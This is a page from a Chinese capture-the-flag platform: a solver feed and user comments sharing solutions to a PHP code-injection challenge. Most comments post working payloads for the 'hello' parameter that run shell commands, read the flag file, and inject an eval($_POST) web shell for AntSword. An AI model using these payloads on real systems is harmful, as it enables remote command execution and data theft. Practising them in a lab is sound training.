评分(10)
解题动态
wujiayi 攻破了该题 9小时前
187784 攻破了该题 11小时前
hahahahahahaha 攻破了该题 11小时前
codegod 攻破了该题 18小时前
Julia 攻破了该题 1天前
kingxin 攻破了该题 1天前
123456sefss 攻破了该题 1天前
hanzkj 攻破了该题 1天前
touchcandy 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
bushi 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 2天前
2757547892 攻破了该题 2天前
没有伞的小白帽 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
评论
一个姓⎝李⎠的师傅~ 1月前
举报
知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d
ubudj 1月前
举报
?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名
默认 1月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 1月前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功
dlgz 1月前
举报
?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)
wuzhi唔知 1月前
举报
http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end
Bruce20231767 1月前
举报
http://117.72.52.127:18257/?hello=system(%22tac%20flag.php%22)
lmds 1月前
举报
?hello=passthru('tac flag.php')
TUGUNBB 2月前
举报
?hello=system("base64 flag.php"),拿到的东西base64解码就行了
iNMB 2月前
举报
简单粗暴,直接连蚁剑?hello=);eval($_POST[%27attack%27]);//
一个姓⎝李⎠的师傅~ 1月前
举报
@a6819772 看你 \$_POST['这里用什么接收'] 就填写什么密码
a6819772 1月前
举报
密码填什么 连蚁剑的话